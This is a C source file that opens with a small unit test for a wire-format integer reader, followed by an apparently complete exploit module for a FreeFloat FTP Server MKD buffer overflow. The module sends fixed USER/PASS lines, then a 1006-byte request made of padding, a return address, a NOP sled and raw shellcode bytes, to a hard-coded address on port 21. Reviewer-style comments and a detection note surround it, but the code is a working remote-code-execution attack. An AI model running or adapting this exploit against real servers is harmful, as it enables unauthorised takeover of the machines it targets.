// Decodes fixed-width signed integers from hex-encoded byte buffers and
// checks the values, re-pointing the reader at a fresh buffer for each width.
TEST(wire_reader_t, ints) {
	auto buff = make_buff(unhexify("7FFF"));
	wire_reader_t reader(buff.get());

	// Rebind `reader` to a new buffer built from `hex`.
	auto load = [&](const char *hex) {
		buff = make_buff(unhexify(hex));
		reader = wire_reader_t(buff.get());
	};

	// Two consecutive int8 reads consume 0x7F then 0xFF.
	ASSERT_EQ(127, reader.int8());
	ASSERT_EQ(-1, reader.int8());

	load("AAFF");
	ASSERT_EQ((int16_t)0xAAFF, reader.int16());

	load("ABCD0123");
	ASSERT_EQ((int32_t)0xABCD0123, reader.int32());

	load("0123456789ABCDEF");
	ASSERT_EQ(0x0123456789ABCDEF, reader.int64());
}
/*
 * Builds one oversized FTP "MKD" request and sends it, after a fixed
 * USER/PASS exchange, to a hard-coded host on port 21.
 *
 * What the code visibly does:
 *  - connects to "10.69.69.208":"21" (see the "Hard coded" comment below);
 *  - fills a 1006-byte request: "MKD " + 247 bytes of 'A' + 4 fixed bytes
 *    + a run of 0x90 bytes + the byte string `sc` + "\r\n";
 *  - sends USER, PASS and the request, reading each reply into `buffer`
 *    without examining it.
 *
 * Detection note (defender's view): an FTP MKD argument close to 1 KB that
 * is mostly a single repeated byte is what this request looks like on the
 * wire; nothing here negotiates TLS, so a network sensor on the control
 * channel sees the full payload.
 *
 * `module` is read only for the print_error() call; the return value is
 * always 0 (a null pointer), so callers cannot distinguish success from
 * failure.
 */
void *freefloat_ftp_server_mkd_exploit(struct module_t *module)
{
	struct module_t *self;
	int sock_fd;
	char buffer[1024];         /* scratch for server replies; never inspected */
	char attack_string[1006];  /* the MKD request, assembled by memcat() below */
	char *sc;                  /* payload bytes (string literal, not freed) */
	int space;                 /* number of 0x90 filler bytes */
	int offset;                /* write cursor into attack_string, advanced by memcat() */
	char *junk;                /* 247 x 'A' from make_buff(); freed at the end */
	char *nops;                /* `space` x 0x90 from make_buff(); freed at the end */

	offset = 0;
	space = 0;

	self =  module;

	/* self->target.offset is printed for diagnostics only; the request is
	 * built with the local `offset`, which starts at 0. */
	print_error("self.offset = %d", self->target.offset);

	memset(&buffer, 0, 1024);

	/* Hard coded until i get a good options method setup */
	/* NOTE(review): the return value is not checked, so a failed connect is
	 * only noticed (if at all) inside the tcp_send_recv() calls below. */
	sock_fd = tcp_socket_connect("10.69.69.208", "21", buffer, 1024);

	/* Pre-fill the whole request with 0x90 so any byte memcat() does not
	 * write still holds that value. */
	memset(&attack_string, '\x90', 1006);

	/* Raw payload bytes. Their length is taken with strlen() below, which
	 * stops at the first NUL byte -- the literal is assumed to contain none. */
	sc = 
	"\xba\x46\x14\xf5\x8a\xda\xc8\xd9\x74\x24\xf4\x5e\x2b\xc9"
	"\xb1\x33\x83\xee\xfc\x31\x56\x0e\x03\x10\x1a\x17\x7f\x60"
	"\xca\x5e\x80\x98\x0b\x01\x08\x7d\x3a\x13\x6e\xf6\x6f\xa3"
	"\xe4\x5a\x9c\x48\xa8\x4e\x17\x3c\x65\x61\x90\x8b\x53\x4c"
	"\x21\x3a\x5c\x02\xe1\x5c\x20\x58\x36\xbf\x19\x93\x4b\xbe"
	"\x5e\xc9\xa4\x92\x37\x86\x17\x03\x33\xda\xab\x22\x93\x51"
	"\x93\x5c\x96\xa5\x60\xd7\x99\xf5\xd9\x6c\xd1\xed\x52\x2a"
	"\xc2\x0c\xb6\x28\x3e\x47\xb3\x9b\xb4\x56\x15\xd2\x35\x69"
	"\x59\xb9\x0b\x46\x54\xc3\x4c\x60\x87\xb6\xa6\x93\x3a\xc1"
	"\x7c\xee\xe0\x44\x61\x48\x62\xfe\x41\x69\xa7\x99\x02\x65"
	"\x0c\xed\x4d\x69\x93\x22\xe6\x95\x18\xc5\x29\x1c\x5a\xe2"
	"\xed\x45\x38\x8b\xb4\x23\xef\xb4\xa7\x8b\x50\x11\xa3\x39"
	"\x84\x23\xee\x57\x5b\xa1\x94\x1e\x5b\xb9\x96\x30\x34\x88"
	"\x1d\xdf\x43\x15\xf4\xa4\xbc\x5f\x55\x8c\x54\x06\x0f\x8d"
	"\x38\xb9\xe5\xd1\x44\x3a\x0c\xa9\xb2\x22\x65\xac\xff\xe4"
	"\x95\xdc\x90\x80\x99\x73\x90\x80\xf9\x12\x02\x48\xd0\xb1"
	"\xa2\xeb\x2c";

	/* Total size - addrlen - offset - payload_len - 'MKD ' - 2 for \r\n*/
	/* 1006 - 4 - 247 - 4 - 2 = 749, so space == 749 - strlen(sc). strlen()
	 * yields size_t; the result is narrowed to int with no range check. */
	space = (1006 - 4 - 247 - strlen(sc) - 4 - 2);

	/* make_buff(byte, n) appears to heap-allocate n copies of byte: both
	 * results are free()d at the end of the function. */
	junk = make_buff('A', 247);
	nops = make_buff('\x90', space);

	/* Assemble the request in order. The piece sizes sum to exactly 1006,
	 * matching the send length used below:
	 *   4 + 247 + 4 + space + strlen(sc) + 2 == 1006 */
	memcat(attack_string, 1006, &offset, "MKD ", 4);
	memcat(attack_string, 1006, &offset, junk, 247);
	memcat(attack_string, 1006, &offset, "\xEF\x31\x9D\x7C", 4); /* the 4 "addr" bytes from the size comment */
	memcat(attack_string, 1006, &offset, nops, space);
	memcat(attack_string, 1006, &offset, sc, strlen(sc));
	memcat(attack_string, 1006, &offset, "\r\n", 2);

	/* Fixed credentials. Each literal is 10 characters but 11 bytes are
	 * sent, so the terminating NUL goes on the wire as well. Replies land
	 * in buffer and are ignored. */
	tcp_send_recv(sock_fd, "USER wtf\r\n", 11, buffer, 1024);
	tcp_send_recv(sock_fd, "PASS wtf\r\n", 11, buffer, 1024);
	tcp_send_recv(sock_fd, attack_string, 1006, buffer, 1024);

	free(junk);
	free(nops);

	/* Always 0 (null); no success/failure information is returned. */
	return 0;
}